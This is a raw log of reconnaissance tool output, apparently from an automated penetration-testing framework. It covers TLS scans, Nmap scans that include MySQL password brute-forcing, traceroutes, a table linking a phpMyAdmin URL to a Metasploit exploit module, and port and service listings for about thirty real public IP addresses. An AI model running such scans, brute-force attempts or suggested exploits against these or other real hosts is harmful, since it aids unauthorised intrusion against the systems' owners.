3328########################################################################################################################
3329Version: 1.11.13-static
3330OpenSSL 1.0.2-chacha (1.0.2g-dev)
3331
3332Connected to 111.90.145.39
3333
3334Testing SSL server 111.90.145.39 on port 443 using SNI name 111.90.145.39
3335
3336 TLS Fallback SCSV:
3337Server supports TLS Fallback SCSV
3338
3339 TLS renegotiation:
3340Session renegotiation not supported
3341
3342 TLS Compression:
3343Compression disabled
3344
3345 Heartbleed:
3346TLS 1.2 not vulnerable to heartbleed
3347TLS 1.1 not vulnerable to heartbleed
3348TLS 1.0 not vulnerable to heartbleed
3349
3350 Supported Server Cipher(s):
3351Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
3352Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
3353Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
3354Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
3355Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
3356Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3357Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
3358Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3359Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
3360Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3361Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
3362Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3363Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3364Accepted TLSv1.2 128 bits AES128-GCM-SHA256
3365Accepted TLSv1.2 256 bits AES256-GCM-SHA384
3366Accepted TLSv1.2 128 bits AES128-SHA256
3367Accepted TLSv1.2 256 bits AES256-SHA256
3368Accepted TLSv1.2 128 bits AES128-SHA
3369Accepted TLSv1.2 256 bits AES256-SHA
3370Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3371Accepted TLSv1.2 256 bits CAMELLIA256-SHA
3372Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3373Accepted TLSv1.2 128 bits CAMELLIA128-SHA
3374Accepted TLSv1.2 112 bits DES-CBC3-SHA
3375Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3376Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3377Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3378Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3379Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3380Accepted TLSv1.1 128 bits AES128-SHA
3381Accepted TLSv1.1 256 bits AES256-SHA
3382Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3383Accepted TLSv1.1 256 bits CAMELLIA256-SHA
3384Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3385Accepted TLSv1.1 128 bits CAMELLIA128-SHA
3386Accepted TLSv1.1 112 bits DES-CBC3-SHA
3387
3388 SSL Certificate:
3389Signature Algorithm: sha1WithRSAEncryption
3390RSA Key Strength: 2048
3391
3392Subject: localhost
3393Issuer: localhost
3394
3395Not valid before: May 3 09:49:26 2019 GMT
3396Not valid after: Sep 17 09:49:26 2046 GMT
3397#######################################################################################################################
3398Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:23 EST
3399NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
3400NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
3401NSE: [mysql-brute] passwords: Time limit 3m00s exceeded.
3402Nmap scan report for web16.support-emilid.com (111.90.145.39)
3403Host is up (0.27s latency).
3404
3405PORT STATE SERVICE VERSION
34063306/tcp open mysql MySQL (unauthorized)
3407| mysql-brute:
3408| Accounts: No valid accounts found
3409|_ Statistics: Performed 3550 guesses in 180 seconds, average tps: 19.4
3410|_mysql-empty-password: Host '45.132.192.65' is not allowed to connect to this MySQL server
3411| mysql-enum:
3412| Accounts: No valid accounts found
3413|_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
3414|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
3415Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3416Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 3.5 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%)
3417No exact OS matches for host (test conditions non-ideal).
3418Network Distance: 25 hops
3419
3420TRACEROUTE (using port 3306/tcp)
3421HOP RTT ADDRESS
34221 129.87 ms 10.203.15.1
34232 ...
34243 131.11 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
34254 131.45 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
34265 134.78 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
34276 162.44 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
34287 167.42 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
34298 252.79 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
34309 250.85 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
343110 246.32 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
343211 244.58 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
343312 258.10 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
343413 271.22 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
343514 275.14 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130)
343615 294.62 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
343716 314.95 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
343817 314.82 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
343918 314.86 ms 38.104.210.82
344019 480.49 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
344120 483.29 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
344221 486.14 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
344322 483.33 ms 124.158.230.70
344423 488.08 ms 111.90.128.46
344524 493.89 ms 172.16.16.2
344625 487.94 ms web16.support-emilid.com (111.90.145.39)
3447########################################################################################################################
3448+------------+---------------------------------------+--------------------------------------------------+-----------+-----------+
3449| App Name | URL to Application | Potential Exploit | Username | Password |
3450+------------+---------------------------------------+--------------------------------------------------+-----------+-----------+
3451| phpMyAdmin | https://111.90.145.39:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
3452+------------+---------------------------------------+--------------------------------------------------+-----------+-----------+
3453########################################################################################################################
3454Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:47 EST
3455Nmap scan report for web16.support-emilid.com (111.90.145.39)
3456Host is up (0.33s latency).
3457
3458PORT STATE SERVICE VERSION
345953/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
346067/tcp closed dhcps
346168/tcp closed dhcpc
346269/tcp closed tftp
346388/tcp closed kerberos-sec
3464123/tcp closed ntp
3465137/tcp closed netbios-ns
3466138/tcp closed netbios-dgm
3467139/tcp filtered netbios-ssn
3468161/tcp closed snmp
3469162/tcp closed snmptrap
3470389/tcp closed ldap
3471520/tcp closed efs
34722049/tcp closed nfs
347353/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
3474| dns-nsid:
3475|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
347667/udp closed dhcps
347768/udp open|filtered dhcpc
347869/udp open|filtered tftp
347988/udp closed kerberos-sec
3480123/udp closed ntp
3481137/udp open|filtered netbios-ns
3482138/udp open|filtered netbios-dgm
3483139/udp closed netbios-ssn
3484161/udp open|filtered snmp
3485162/udp closed snmptrap
3486389/udp open|filtered ldap
3487520/udp closed route
34882049/udp closed nfs
3489Device type: general purpose|storage-misc|WAP|broadband router|router|media device|webcam
3490Running (JUST GUESSING): Linux 2.6.X|3.X (95%), HP embedded (93%), MikroTik RouterOS 6.X (91%), Infomir embedded (91%), Ubiquiti AirOS 5.X (91%)
3491OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:mikrotik:routeros:6.19 cpe:/h:infomir:mag-250 cpe:/o:ubnt:airos:5.5.9 cpe:/o:linux:linux_kernel:2.6.17
3492Aggressive OS guesses: Linux 2.6.32 - 3.1 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 (94%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.10 (94%), HP P2000 G3 NAS device (93%), Linux 3.2 (93%), Linux 3.11 (93%), Linux 2.6.32 - 3.10 (92%)
3493No exact OS matches for host (test conditions non-ideal).
3494Network Distance: 25 hops
3495Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
3496
3497TRACEROUTE (using port 2049/tcp)
3498HOP RTT ADDRESS
34991 129.71 ms 10.203.15.1
35002 ...
35013 130.94 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
35024 129.95 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
35035 135.71 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
35046 154.51 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
35057 159.26 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
35068 248.70 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
35079 246.53 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
350810 246.09 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
350911 249.07 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
351012 261.08 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
351113 275.46 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
351214 289.90 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
351315 294.09 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
351416 302.86 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
351517 312.61 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
351618 317.83 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
351719 479.09 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
351820 483.29 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
351921 487.88 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
352022 480.45 ms 124.158.230.70
352123 487.53 ms 111.90.128.46
352224 489.10 ms 172.16.16.2
352325 483.46 ms web16.support-emilid.com (111.90.145.39)
3524########################################################################################################################
3525Hosts
3526=====
3527
3528address mac name os_name os_flavor os_sp purpose info comments
3529------- --- ---- ------- --------- ----- ------- ---- --------
353037.1.207.121 teens-sins.net 2-Series 3.X device
353145.88.202.111 Linux 3.X server
353264.69.94.253 Unknown device
353369.163.233.4 ps54052.dreamhostps.com Linux 14.04 server
353474.117.180.192 embedded device
353582.94.222.131 Unknown device
353692.123.250.35 a92-123-250-35.deploy.static.akamaitechnologies.com embedded device
353792.123.250.65 a92-123-250-65.deploy.static.akamaitechnologies.com Linux 3.X server
3538104.244.76.231 Linux 3.X server
3539104.244.77.188 Linux 3.X server
3540104.244.79.89 Linux 3.X server
3541111.90.145.39 web16.support-emilid.com Linux 2.6.X server
3542149.126.72.220 149.126.72.220.ip.incapdns.net Linux 3.X server
3543151.106.38.107 ns3152160.ip-151-106-38.eu embedded device
3544158.69.13.254 ip254.ip-158-69-13.net 2-Series 2.6.X device
3545162.244.35.13 xnlog.com FreeBSD 7.X device
3546169.239.218.20 cp10.domains.co.za Linux 2.6.X server
3547173.214.244.169 173.214.244.169.serverel.net Unknown device
3548174.142.53.51 mail.marineland.ca Linux 3.X server
3549190.98.209.37 static.190.98.209.37.gtdinternet.com Unknown device
3550190.153.209.187 static.190.153.209.187.gtdinternet.com Unknown device
3551190.153.219.254 mail.evopoli.cl Linux 3.X server
3552200.73.54.34 mail.maxtel.cl Linux 2.6.X server
3553204.93.193.141 suzuka.mochahost.com Unknown device
3554206.48.140.40 Unknown device
3555207.246.147.189 2-Series device
3556207.246.147.190 Linux 4.X server
3557207.246.147.247 Linux 4.X server
3558207.246.147.248 Linux 4.X server
3559211.13.196.135 sv3.isle.ne.jp Linux 2.6.X server
3560218.45.5.97 www.town.koya.wakayama.jp Linux 2.6.X server
3561########################################################################################################################
3562Services
3563========
3564
3565host port proto name state info
3566---- ---- ----- ---- ----- ----
356737.1.207.121 53 tcp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
356837.1.207.121 53 udp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
356937.1.207.121 67 tcp dhcps filtered
357037.1.207.121 67 udp dhcps unknown
357137.1.207.121 68 tcp dhcpc filtered
357237.1.207.121 68 udp dhcpc filtered
357337.1.207.121 69 tcp tftp filtered
357437.1.207.121 69 udp tftp unknown
357537.1.207.121 88 tcp kerberos-sec filtered
357637.1.207.121 88 udp kerberos-sec filtered
357737.1.207.121 123 tcp ntp filtered
357837.1.207.121 123 udp ntp unknown
357937.1.207.121 137 tcp netbios-ns filtered
358037.1.207.121 137 udp netbios-ns unknown
358137.1.207.121 138 tcp netbios-dgm filtered
358237.1.207.121 138 udp netbios-dgm unknown
358337.1.207.121 139 tcp netbios-ssn filtered
358437.1.207.121 139 udp netbios-ssn unknown
358537.1.207.121 161 tcp snmp filtered
358637.1.207.121 161 udp snmp unknown
358737.1.207.121 162 tcp snmptrap filtered
358837.1.207.121 162 udp snmptrap unknown
358937.1.207.121 389 tcp ldap filtered
359037.1.207.121 389 udp ldap unknown
359137.1.207.121 520 tcp efs filtered
359237.1.207.121 520 udp route unknown
359337.1.207.121 2049 tcp nfs filtered
359437.1.207.121 2049 udp nfs filtered
359545.88.202.111 22 tcp ssh open OpenSSH 7.9p1 Debian 10+deb10u1 protocol 2.0
359645.88.202.111 53 tcp domain open PowerDNS Authoritative Server 4.2.0-rc3
359745.88.202.111 53 udp domain open PowerDNS Authoritative Server 4.2.0-rc3
359845.88.202.111 67 tcp dhcps closed
359945.88.202.111 67 udp dhcps unknown
360045.88.202.111 68 tcp dhcpc closed
360145.88.202.111 68 udp dhcpc unknown
360245.88.202.111 69 tcp tftp closed
360345.88.202.111 69 udp tftp closed
360445.88.202.111 80 tcp http open nginx
360545.88.202.111 88 tcp kerberos-sec closed
360645.88.202.111 88 udp kerberos-sec unknown
360745.88.202.111 123 tcp ntp closed
360845.88.202.111 123 udp ntp closed
360945.88.202.111 137 tcp netbios-ns closed
361045.88.202.111 137 udp netbios-ns filtered
361145.88.202.111 138 tcp netbios-dgm closed
361245.88.202.111 138 udp netbios-dgm filtered
361345.88.202.111 139 tcp netbios-ssn closed
361445.88.202.111 139 udp netbios-ssn closed
361545.88.202.111 161 tcp snmp closed
361645.88.202.111 161 udp snmp closed
361745.88.202.111 162 tcp snmptrap closed
361845.88.202.111 162 udp snmptrap closed
361945.88.202.111 179 tcp bgp filtered
362045.88.202.111 389 tcp ldap closed
362145.88.202.111 389 udp ldap unknown
362245.88.202.111 443 tcp ssl/http open nginx
362345.88.202.111 520 tcp efs closed
362445.88.202.111 520 udp route unknown
362545.88.202.111 2049 tcp nfs closed
362645.88.202.111 2049 udp nfs closed
362745.88.202.111 10050 tcp tcpwrapped open
362864.69.94.253 53 tcp domain filtered
362964.69.94.253 53 udp domain unknown
363064.69.94.253 67 tcp dhcps filtered
363164.69.94.253 67 udp dhcps unknown
363264.69.94.253 68 tcp dhcpc filtered
363364.69.94.253 68 udp dhcpc unknown
363464.69.94.253 69 tcp tftp filtered
363564.69.94.253 69 udp tftp unknown
363664.69.94.253 88 tcp kerberos-sec filtered
363764.69.94.253 88 udp kerberos-sec unknown
363864.69.94.253 123 tcp ntp filtered
363964.69.94.253 123 udp ntp unknown
364064.69.94.253 137 tcp netbios-ns filtered
364164.69.94.253 137 udp netbios-ns unknown
364264.69.94.253 138 tcp netbios-dgm filtered
364364.69.94.253 138 udp netbios-dgm unknown
364464.69.94.253 139 tcp netbios-ssn filtered
364564.69.94.253 139 udp netbios-ssn unknown
364664.69.94.253 161 tcp snmp filtered
364764.69.94.253 161 udp snmp unknown
364864.69.94.253 162 tcp snmptrap filtered
364964.69.94.253 162 udp snmptrap unknown
365064.69.94.253 389 tcp ldap filtered
365164.69.94.253 389 udp ldap unknown
365264.69.94.253 520 tcp efs filtered
365364.69.94.253 520 udp route unknown
365464.69.94.253 2049 tcp nfs filtered
365564.69.94.253 2049 udp nfs unknown
365669.163.233.4 21 tcp ftp open 220 DreamHost FTP Server\x0d\x0a
365769.163.233.4 22 tcp ssh open SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13
365869.163.233.4 25 tcp open
365969.163.233.4 53 tcp domain closed
366069.163.233.4 53 udp domain unknown
366169.163.233.4 67 tcp dhcps closed
366269.163.233.4 67 udp dhcps closed
366369.163.233.4 68 tcp dhcpc closed
366469.163.233.4 68 udp dhcpc unknown
366569.163.233.4 69 tcp tftp closed
366669.163.233.4 69 udp tftp closed
366769.163.233.4 88 tcp kerberos-sec closed
366869.163.233.4 88 udp kerberos-sec unknown
366969.163.233.4 123 tcp ntp closed
367069.163.233.4 123 udp ntp unknown
367169.163.233.4 137 tcp netbios-ns closed
367269.163.233.4 137 udp netbios-ns closed
367369.163.233.4 138 tcp netbios-dgm closed
367469.163.233.4 138 udp netbios-dgm closed
367569.163.233.4 139 tcp netbios-ssn closed
367669.163.233.4 139 udp netbios-ssn unknown
367769.163.233.4 161 tcp snmp closed
367869.163.233.4 161 udp snmp closed
367969.163.233.4 162 tcp snmptrap closed
368069.163.233.4 162 udp snmptrap closed
368169.163.233.4 389 tcp ldap closed
368269.163.233.4 389 udp ldap unknown
368369.163.233.4 520 tcp efs closed
368469.163.233.4 520 udp route closed
368569.163.233.4 2049 tcp nfs closed
368669.163.233.4 2049 udp nfs unknown
368774.117.180.192 21 tcp ftp filtered 220 Hello.\x0d\x0a
368874.117.180.192 22 tcp ssh filtered
368974.117.180.192 25 tcp smtp filtered
369074.117.180.192 53 tcp domain closed
369174.117.180.192 53 udp domain unknown
369274.117.180.192 67 tcp dhcps closed
369374.117.180.192 67 udp dhcps unknown
369474.117.180.192 68 tcp dhcpc closed
369574.117.180.192 68 udp dhcpc closed
369674.117.180.192 69 tcp tftp closed
369774.117.180.192 69 udp tftp closed
369874.117.180.192 80 tcp http filtered
369974.117.180.192 88 tcp kerberos-sec closed
370074.117.180.192 88 udp kerberos-sec closed
370174.117.180.192 110 tcp pop3 filtered
370274.117.180.192 111 tcp rpcbind filtered
370374.117.180.192 123 tcp ntp closed
370474.117.180.192 123 udp ntp unknown
370574.117.180.192 137 tcp netbios-ns closed
370674.117.180.192 137 udp netbios-ns closed
370774.117.180.192 138 tcp netbios-dgm closed
370874.117.180.192 138 udp netbios-dgm unknown
370974.117.180.192 139 tcp netbios-ssn closed
371074.117.180.192 139 udp netbios-ssn unknown
371174.117.180.192 143 tcp imap filtered
371274.117.180.192 161 tcp snmp closed
371374.117.180.192 161 udp snmp closed
371474.117.180.192 162 tcp snmptrap closed
371574.117.180.192 162 udp snmptrap unknown
371674.117.180.192 323 tcp rpki-rtr filtered
371774.117.180.192 389 tcp ldap closed
371874.117.180.192 389 udp ldap closed
371974.117.180.192 443 tcp https filtered
372074.117.180.192 465 tcp ssl/smtp open Exim smtpd 4.92.3
372174.117.180.192 520 tcp efs closed
372274.117.180.192 520 udp route unknown
372374.117.180.192 587 tcp submission filtered
372474.117.180.192 873 tcp rsync filtered
372574.117.180.192 993 tcp imaps filtered
372674.117.180.192 995 tcp pop3s filtered
372774.117.180.192 2049 tcp nfs closed
372874.117.180.192 2049 udp nfs closed
372974.117.180.192 2525 tcp smtp open Exim smtpd
373074.117.180.192 3306 tcp mysql filtered
373174.117.180.192 4949 tcp tcpwrapped open
373274.117.180.192 5666 tcp tcpwrapped open
373374.117.180.192 6380 tcp filtered
373474.117.180.192 9306 tcp sphinx-search open Sphinx Search daemon 2.1.5-id64-release
373574.117.180.192 11211 tcp memcache filtered
373682.94.222.131 53 udp domain unknown
373782.94.222.131 67 udp dhcps unknown
373882.94.222.131 68 udp dhcpc unknown
373982.94.222.131 69 udp tftp unknown
374082.94.222.131 88 udp kerberos-sec unknown
374182.94.222.131 123 udp ntp unknown
374282.94.222.131 137 udp netbios-ns unknown
374382.94.222.131 138 udp netbios-dgm unknown
374482.94.222.131 139 udp netbios-ssn unknown
374582.94.222.131 161 udp snmp unknown
374682.94.222.131 162 udp snmptrap unknown
374782.94.222.131 389 udp ldap unknown
374882.94.222.131 520 udp route unknown
374982.94.222.131 2049 udp nfs unknown
375092.123.250.35 53 tcp domain closed
375192.123.250.35 53 udp domain closed
375292.123.250.35 67 tcp dhcps filtered
375392.123.250.35 67 udp dhcps unknown
375492.123.250.35 68 tcp dhcpc filtered
375592.123.250.35 68 udp dhcpc unknown
375692.123.250.35 69 tcp tftp filtered
375792.123.250.35 69 udp tftp unknown
375892.123.250.35 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
375992.123.250.35 88 tcp kerberos-sec filtered
376092.123.250.35 88 udp kerberos-sec unknown
376192.123.250.35 123 tcp ntp filtered
376292.123.250.35 123 udp ntp unknown
376392.123.250.35 137 tcp netbios-ns filtered
376492.123.250.35 137 udp netbios-ns unknown
376592.123.250.35 138 tcp netbios-dgm filtered
376692.123.250.35 138 udp netbios-dgm unknown
376792.123.250.35 139 tcp netbios-ssn filtered
376892.123.250.35 139 udp netbios-ssn unknown
376992.123.250.35 161 tcp snmp filtered
377092.123.250.35 161 udp snmp unknown
377192.123.250.35 162 tcp snmptrap filtered
377292.123.250.35 162 udp snmptrap unknown
377392.123.250.35 389 tcp ldap filtered
377492.123.250.35 389 udp ldap unknown
377592.123.250.35 443 tcp ssl/https open
377692.123.250.35 520 tcp efs filtered
377792.123.250.35 520 udp route unknown
377892.123.250.35 2049 tcp nfs filtered
377992.123.250.35 2049 udp nfs unknown
378092.123.250.35 8883 tcp secure-mqtt open
378192.123.250.65 53 tcp domain filtered
378292.123.250.65 53 udp domain unknown
378392.123.250.65 67 tcp dhcps filtered
378492.123.250.65 67 udp dhcps unknown
378592.123.250.65 68 tcp dhcpc filtered
378692.123.250.65 68 udp dhcpc unknown
378792.123.250.65 69 tcp tftp filtered
378892.123.250.65 69 udp tftp unknown
378992.123.250.65 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
379092.123.250.65 88 tcp kerberos-sec filtered
379192.123.250.65 88 udp kerberos-sec unknown
379292.123.250.65 123 tcp ntp filtered
379392.123.250.65 123 udp ntp unknown
379492.123.250.65 137 tcp netbios-ns filtered
379592.123.250.65 137 udp netbios-ns unknown
379692.123.250.65 138 tcp netbios-dgm filtered
379792.123.250.65 138 udp netbios-dgm unknown
379892.123.250.65 139 tcp netbios-ssn filtered
379992.123.250.65 139 udp netbios-ssn unknown
380092.123.250.65 161 tcp snmp filtered
380192.123.250.65 161 udp snmp unknown
380292.123.250.65 162 tcp snmptrap filtered
380392.123.250.65 162 udp snmptrap unknown
380492.123.250.65 389 tcp ldap filtered
380592.123.250.65 389 udp ldap unknown
380692.123.250.65 443 tcp ssl/https open
380792.123.250.65 520 tcp efs filtered
380892.123.250.65 520 udp route unknown
380992.123.250.65 2049 tcp nfs filtered
381092.123.250.65 2049 udp nfs unknown
381192.123.250.65 8883 tcp secure-mqtt open
3812104.244.76.231 53 tcp domain filtered
3813104.244.76.231 53 udp domain unknown
3814104.244.76.231 67 tcp dhcps filtered
3815104.244.76.231 67 udp dhcps unknown
3816104.244.76.231 68 tcp dhcpc filtered
3817104.244.76.231 68 udp dhcpc unknown
3818104.244.76.231 69 tcp tftp filtered
3819104.244.76.231 69 udp tftp unknown
3820104.244.76.231 80 tcp http open nginx
3821104.244.76.231 88 tcp kerberos-sec filtered
3822104.244.76.231 88 udp kerberos-sec unknown
3823104.244.76.231 123 tcp ntp filtered
3824104.244.76.231 123 udp ntp unknown
3825104.244.76.231 137 tcp netbios-ns filtered
3826104.244.76.231 137 udp netbios-ns unknown
3827104.244.76.231 138 tcp netbios-dgm filtered
3828104.244.76.231 138 udp netbios-dgm unknown
3829104.244.76.231 139 tcp netbios-ssn filtered
3830104.244.76.231 139 udp netbios-ssn unknown
3831104.244.76.231 161 tcp snmp filtered
3832104.244.76.231 161 udp snmp unknown
3833104.244.76.231 162 tcp snmptrap filtered
3834104.244.76.231 162 udp snmptrap unknown
3835104.244.76.231 389 tcp ldap filtered
3836104.244.76.231 389 udp ldap unknown
3837104.244.76.231 443 tcp ssl/http open nginx
3838104.244.76.231 520 tcp efs filtered
3839104.244.76.231 520 udp route unknown
3840104.244.76.231 2049 tcp nfs filtered
3841104.244.76.231 2049 udp nfs unknown
3842104.244.76.231 5040 tcp unknown closed
3843104.244.76.231 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
3844104.244.76.231 16221 tcp closed
3845104.244.76.231 23022 tcp closed
3846104.244.76.231 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
3847104.244.77.188 53 tcp domain filtered
3848104.244.77.188 53 udp domain unknown
3849104.244.77.188 67 tcp dhcps filtered
3850104.244.77.188 67 udp dhcps unknown
3851104.244.77.188 68 tcp dhcpc filtered
3852104.244.77.188 68 udp dhcpc unknown
3853104.244.77.188 69 tcp tftp filtered
3854104.244.77.188 69 udp tftp unknown
3855104.244.77.188 80 tcp http open nginx
3856104.244.77.188 88 tcp kerberos-sec filtered
3857104.244.77.188 88 udp kerberos-sec unknown
3858104.244.77.188 123 tcp ntp filtered
3859104.244.77.188 123 udp ntp unknown
3860104.244.77.188 137 tcp netbios-ns filtered
3861104.244.77.188 137 udp netbios-ns unknown
3862104.244.77.188 138 tcp netbios-dgm filtered
3863104.244.77.188 138 udp netbios-dgm unknown
3864104.244.77.188 139 tcp netbios-ssn filtered
3865104.244.77.188 139 udp netbios-ssn unknown
3866104.244.77.188 161 tcp snmp filtered
3867104.244.77.188 161 udp snmp unknown
3868104.244.77.188 162 tcp snmptrap filtered
3869104.244.77.188 162 udp snmptrap unknown
3870104.244.77.188 389 tcp ldap filtered
3871104.244.77.188 389 udp ldap unknown
3872104.244.77.188 443 tcp ssl/http open nginx
3873104.244.77.188 520 tcp efs filtered
3874104.244.77.188 520 udp route unknown
3875104.244.77.188 2049 tcp nfs filtered
3876104.244.77.188 2049 udp nfs unknown
3877104.244.77.188 5040 tcp unknown closed
3878104.244.77.188 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
3879104.244.77.188 16221 tcp closed
3880104.244.77.188 23022 tcp closed
3881104.244.77.188 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
3882104.244.79.89 53 tcp domain filtered
3883104.244.79.89 53 udp domain unknown
3884104.244.79.89 67 tcp dhcps filtered
3885104.244.79.89 67 udp dhcps unknown
3886104.244.79.89 68 tcp dhcpc filtered
3887104.244.79.89 68 udp dhcpc unknown
3888104.244.79.89 69 tcp tftp filtered
3889104.244.79.89 69 udp tftp unknown
3890104.244.79.89 80 tcp http open nginx
3891104.244.79.89 88 tcp kerberos-sec filtered
3892104.244.79.89 88 udp kerberos-sec unknown
3893104.244.79.89 123 tcp ntp filtered
3894104.244.79.89 123 udp ntp unknown
3895104.244.79.89 137 tcp netbios-ns filtered
3896104.244.79.89 137 udp netbios-ns unknown
3897104.244.79.89 138 tcp netbios-dgm filtered
3898104.244.79.89 138 udp netbios-dgm unknown
3899104.244.79.89 139 tcp netbios-ssn filtered
3900104.244.79.89 139 udp netbios-ssn unknown
3901104.244.79.89 161 tcp snmp filtered
3902104.244.79.89 161 udp snmp unknown
3903104.244.79.89 162 tcp snmptrap filtered
3904104.244.79.89 162 udp snmptrap unknown
3905104.244.79.89 389 tcp ldap filtered
3906104.244.79.89 389 udp ldap unknown
3907104.244.79.89 443 tcp ssl/http open nginx
3908104.244.79.89 520 tcp efs filtered
3909104.244.79.89 520 udp route unknown
3910104.244.79.89 2049 tcp nfs filtered
3911104.244.79.89 2049 udp nfs unknown
3912104.244.79.89 7910 tcp ssl/http open nginx
3913104.244.79.89 7920 tcp unknown closed
3914104.244.79.89 7930 tcp closed
3915104.244.79.89 16001 tcp http open MiniServ 1.930 Webmin httpd
3916104.244.79.89 16010 tcp ssl/http open nginx
